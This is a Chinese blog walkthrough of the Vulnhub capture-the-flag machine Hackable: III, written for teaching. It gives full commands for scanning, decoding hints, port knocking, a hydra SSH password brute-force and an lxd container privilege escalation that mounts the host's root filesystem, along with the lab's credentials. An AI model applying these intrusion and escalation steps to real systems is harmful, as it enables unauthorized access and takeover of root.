看完这篇 教你玩转渗透测试靶机Vulnhub——Hackable: III

最新推荐文章于 2023-10-26 19:39:34 发布
最新推荐文章于 2023-10-26 19:39:34 发布
阅读量772 收藏 1
点赞数 2
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: Vulnhub靶机 CTF 端口敲门 HackableIII lxd提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/131380244
版权

Vulnhub靶机hackableII渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

老样子需要找到flag即可。

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/hackable/hackable3.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后导入 Oracle VM打开即可。

在这里插入图片描述
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述

使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.105

渗透机kali IP :192.168.0.102 靶机IP :192.168.0.105

在这里插入图片描述
发现开启了2280端口还是老样子先访问一下,然后扫描网页后台dirb、dirsearch、whatweb、gobuster、nikto

F12查看一下源代码,发现了一个邮箱和一个用户jubiscleudo还有/robots.txt/进行访问

dirb扫描发现了/backup/下有个wordlist.txt字典wget命令进行下载,在访问/config/进行base64编码解密得到:10000

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
dirsearch再扫一下发现/css/下面也有东西Brainfuck解码得到4444

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Brainfuck在线解密http://www.hiencode.com/brain.html

在这里插入图片描述
login.php得源代码中发现了3.jpg进行访问,steghide进行解密得到:65535

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

steghide extract -sf 3.jpg
cat steganopayload148505.txt

这里我们已经可以猜测到了考点:端口敲门 10000,4444,65535 而且还给了22端口

②:端口敲门:

使用命令:knock 192.168.0.105 10000 4444 65535

在这里插入图片描述
在这里插入图片描述

③:SSH暴力破解:

这里我们的思路就是:刚刚得到个字典进行ssh爆破密码 使用工具:hydra 得到密码:onlymy尝试登入登入成功!!

hydra -l jubiscleudo -P wordlist.txt 192.168.0.105 ssh

在这里插入图片描述
在这里插入图片描述

④:lxd提权:

发现了一个新用户:hackable_3和密码TrOLLED_3

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
lxd 提权原理是下载一个镜像,使用镜像创建容器,将容器目录直接映射到物理主机目录,即可在容器中直接访问物理主机的文件
查看当前系统中的镜像:lxc image list

cd /tmp
git clone https://github.com/saghul/lxd-alpine-builder/
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
lxc image import ./alpine*.tar.gz --alias myimage
lxd init
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh

在这里插入图片描述
在这里插入图片描述

⑤:获取FLAG:

在这里插入图片描述
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度中等吧

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb,ffuf等 查看F12源码信息
2.CTF的一些编码BrainfuckBase64编码
3.端口敲门服务 使用kncok敲门开启ssh hydra和steghide 工具的使用
4.lxd提权的方法 find 查找flag

Hackable系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
专栏目录
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1872
靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
HACKABLE: III实战演练
龙狼刺的博客
05-24 655
Hackable III
Hackable Projects (可拓展的项目)
pirate4444
09-20 356
试着翻译一些英文Blog,这是小试鸡刀第一篇,是Google Testing Blog发布的关于Hackable Projects的。感觉翻译得有点怪,其中有些错误与不解,希望有同学指正。   Hackable Projects(点击访问原文) 可拓展的项目   Introduction  简介 Software development is difficult. Projec...
ATOM -- A hackable text editor for the 21st Century
赱向远方
08-12 1102
今天安装Atom试了下安装了四个插件打开log文件的时候,很多飘红的下划线,是Atom进行spell checking的原因: search “spell-check”disable http://superuser.com/questions/999695/how-to-disable-spell-checking-in-atomshortcut:split pane: ctrl + k
VulnHub日记(三): Hackable 3
Dawn_Xi的博客
08-05 570
靶机介绍 中等难度的ctf虚拟机 虚拟机链接:https://www.vulnhub.com/entry/hackable-iii,720/ 开始练习 本机ip:192.168.56.102 nmap扫出目的机ip:192.168.56.107 nmap -sS 192.168.56.0/24 扫描开启服务 nmap -A -p- 192.168.56.107 扫描目录 dirsearch -e txt,php,html,flag,asp,aspx,bak,jpg,img,h
VulnHub-hackableII
sanqin_的博客
07-04 367
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/hackable-ii,711/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 该靶机21端口开放ftp,22端口开放ssh,80端口开放http 访问http,是apache的默认页面,不过提示了使用dirb扫描 在扫描的同时用匿名用户查看一下ftp 匿名用户名:anonymous 密码:
【安全】vulnhub实验HACKABLE: II
qq_43017750的博客
06-29 2040
实验环境下载链接:https://download.vulnhub.com/hackable/hackableII.ova 注意:使用vbox打开,vmware打开可能会导致虚拟机网卡获取不到地址 修改虚拟机网卡设置为仅主机(Host-Only)网络 实验步骤: 1.主机发现 c:\>nmap -PR -sn -n 192.168.56.0/24 Starting Nmap 7.00 ( https://nmap.org ) at 2021-06-29 11:38 ?D1ú±ê×?ê±?? Nma
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1206
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2523
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub_hackableII
qq_45434762的博客
07-02 501
主机信息kali:192.168.1.7 hackableII:192.168.1.8 信息收集通过nmap扫描目标主机发现开放了3个端口,并且ftp可匿名登录nmap -T4 -A -v...
VULNHUB靶机渗透——hackable2
aarong的博客
12-20 2101
前言 可能很多人在进行靶机渗透的时候会出现扫描不出靶机IP的情况,这里是靶机的网络配置没有设置好,设定跟你的虚拟网卡一致就可以了,具体参考这篇文章和这篇文章。 渗透过程 网络拓扑:攻击机和靶机同是NAT模式 (1)arp-scan -l扫描本地主机IP 这里根据MAC地址的不同判断出192.168.65.133为靶机IP地址 (2)Nmap扫描 nmap -A -T4 -p 1-65535 192.168.65.133 这里发现靶机开放了21 22 80三个端口,而且21端口是允许匿名登录的,等会直接
自主搭建的三层网络域渗透靶场打靶记录
Innocence_0的博客
08-01 848
假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。文中若有不当之处还请各位大佬多多点评公众号:WHOAMIAnony整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。端口扫描端口服务识别漏洞搜索与利用Laravel Debug mode RCE(CVE-2021-3129)漏洞利用Docker逃逸通达OA v11.3 漏洞利用Linux环境变量提权Redis 未授权访问漏洞。
VulnHub1:Jangow: 1.0.1靶机入侵
g457499940的专栏
08-12 747
网络安全
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 317
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
渗透靶机扫描不到ip地址
qq_63283137的博客
09-23 2005
原因一、没有开启nat模式原因二、虚拟网络编辑器错误原因三、靶机网卡配置错误。
Vulnhub靶机】Deathnote: 1死亡笔记
过期的秋刀鱼
09-16 1073
so Easy
VulnHub-Durian靶机详细渗透过程
MRS_jianai的博客
01-01 782
VulnHub-Durian靶机详细渗透过程
这篇 玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
最新发布
Aluxian_的博客
10-26 820
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去渗透测试提权、漏洞利用、代码审计等等有趣的实战。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值